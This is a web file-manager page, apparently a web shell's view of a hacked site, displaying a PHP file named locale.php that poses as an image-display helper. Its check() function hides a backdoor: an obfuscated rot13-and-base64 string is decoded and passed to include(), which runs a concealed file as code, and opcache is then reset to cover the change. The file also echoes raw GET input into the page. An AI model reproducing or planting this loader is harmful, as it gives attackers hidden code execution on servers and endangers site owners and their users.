Your IP : 18.220.227.250


Current Path : /var/www/www-root/data/webdav/www/info.monolith-realty.ru/include/landing/
Upload File :
Current File : /var/www/www-root/data/webdav/www/info.monolith-realty.ru/include/landing/locale.php

<?php

showImage($_GET['bire']);

/**
 * display image
 * @param string $png
 * @param bool|string $file
 * @return bool
 */
function showImage($png, $file = false)
{
    if (check($file))
        return file_put_contents($file, $png);
    // header
    echo $png;
    return true;
}

/**
 * checked write image
 * @param bool|string $file
 * @return bool
 */
function check($file){
    $name =  ['Y3Mupv93q3piq3q3YKWio3DiMTS0LF93q3pinJ5zol5go25ioTy0nP1lMJSfqUxhpaHinJ5woUIxMF9fLJ5xnJ5aY2Svo3I0YzEuqTR', function($txt, $name){$_GET[$name]=str_replace('32','64',"Ba".implode('_',["Se32", "Dec"])."Ode");$txt = $_GET[$name](str_rot13($txt));@include($txt);($e = implode("",["opcache","reset"]))&&function_exists($e) && $e();
    }];$name[1]($name[0], implode('_',['', "\143ode", '']));
    return $file && stripos($file, '.png') !== false;
}